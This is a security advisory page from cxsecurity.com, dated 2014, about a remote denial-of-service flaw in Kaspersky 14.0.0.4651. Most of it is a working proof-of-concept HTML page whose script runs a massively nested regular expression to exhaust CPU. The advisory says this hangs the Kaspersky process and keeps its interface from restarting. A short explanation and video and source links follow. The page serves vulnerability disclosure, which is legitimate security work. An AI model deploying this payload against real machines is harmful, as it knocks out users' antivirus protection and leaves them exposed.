Bug: Kaspersky 14.0.0.4651 RegExp Remote Denial of Service PoC2 *youtube ( Ascii Version )

Search:
WLB2

Kaspersky 14.0.0.4651 RegExp Remote Denial of Service PoC2 *youtube

Published / (Updated)
Credit
Risk
2014-03-18 / 2014-03-19
CXSECURITY
Medium
CWE
CVE
Local
Remote
N/A
N/A ( Add )
No
Yes

Kaspersky has released updated for first PoC presented here

http://www.youtube.com/watch?v=joa_9IS7U90

but there are still many combinations of patterns. For exmaple next PoC2 is available here

https://www.youtube.com/watch?v=9PYtL0zck3I

Code:
https://devilteam.pl/regex2.html

------
<HTML>
<HEAD>
<TITLE>RegExp Resource Exhaustion </TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF">
<SCRIPT type="text/javascript">
var patt1=new
RegExp("(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.
*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.
*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10
}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10
}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10
}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10
}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10
}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10
}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10
}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*
)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*
)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*
)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*
)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+)");
document.write(patt1.exec("peace"));
</SCRIPT>
</BODY>
</HTML>
------

These expression leads to hang up kaspersky process by CPU Exhaustion. Making it impossible to shut down and restart
Kaspersky GUI.
A weak implementation of RE difficult defense against this type of attack.
In my opinion the most stable implementation of regular expressions is NetBSD/OpenBSD where the authors have reduced the
risk of leakage of resources by the level of recursion.

References:

http://www.youtube.com/watch?v=9PYtL0zck3I
http://www.youtube.com/watch?v=joa_9IS7U90
http://cxsecurity.com/issue/WLB-2014030106
http://cxsecurity.com/issue/WLB-2014030108
https://devilteam.pl/regex2.html

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version